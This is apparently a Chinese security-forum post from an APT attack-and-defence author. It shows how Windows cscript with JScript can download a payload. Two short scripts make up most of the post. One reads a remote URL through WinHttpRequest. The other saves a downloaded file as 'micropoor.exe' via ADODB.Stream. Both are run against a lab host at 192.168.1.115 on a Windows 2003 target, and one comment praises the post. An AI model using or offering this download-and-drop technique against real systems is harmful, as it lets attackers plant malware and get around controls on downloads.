首页
论坛
专栏
课程

分享:
专注APT攻击与防御
https://micropoor.blogspot.com/

windows 全版本都会默认支持js,并且通过cscript来调用达到下载payload的目的。

靶机:windows 2003
读取:

C:test>cscript /nologo downfile.js http://192.168.1.115/robots.txt
附代码:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

写入:
C:test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt
附代码:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");

后者的话:简单,易用,轻便。

Micropoor

上一篇 :
下一篇 :
讨论 (1)
newusers 2019-2-25
 举报
厉害厉害!
这是高手!
沪ICP备16048531号-1
沪公网安备 31011502006611号